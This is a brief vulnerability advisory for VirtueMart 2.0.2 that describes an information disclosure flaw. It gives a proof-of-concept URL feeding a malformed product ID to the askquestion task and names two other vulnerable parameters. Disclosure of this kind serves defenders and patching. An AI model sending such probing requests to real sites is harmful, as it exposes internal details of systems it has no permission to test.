VirtueMart version 2.0.2 suffers from an information disclosure vulnerability.
95cadf69d9a4e7ba9c7a3b57090837099bddca444d887db04728ae94028fb0ad
[ TITLE ....... ][ VirtueMart 2.0.2 Information Disclosure
[ DATE ........ ][ 06.04.2012
[ AUTOHR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://virtuemart.org
[ VERSION ..... ][ 2.0.2
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [
[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...
[--------------------------------------------[
[ 1. What is this?
This is very nice e-commerce webapp, You should try it! ;)
[--------------------------------------------[
[ 2. What is the type of vulnerability?
Information disclosure in this webapp.
You should know that some of examples could not work in 'secured' php.ini.
[--------------------------------------------[
[ 3. Where is bug :)
http://joomla/index.php/en/dk?task=askquestion&virtuemart_product_id=limit%20100111111111111&virtuemart_category_id=1&tmpl=component
Parameter shipto_virtuemart_country_id is also vulnerable.
Parameter shipto_phone_1 is also vulnerable.
[--------------------------------------------[
[ 4. More...
- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ All questions about new projects @ mail now :)
]
[ Best regards
[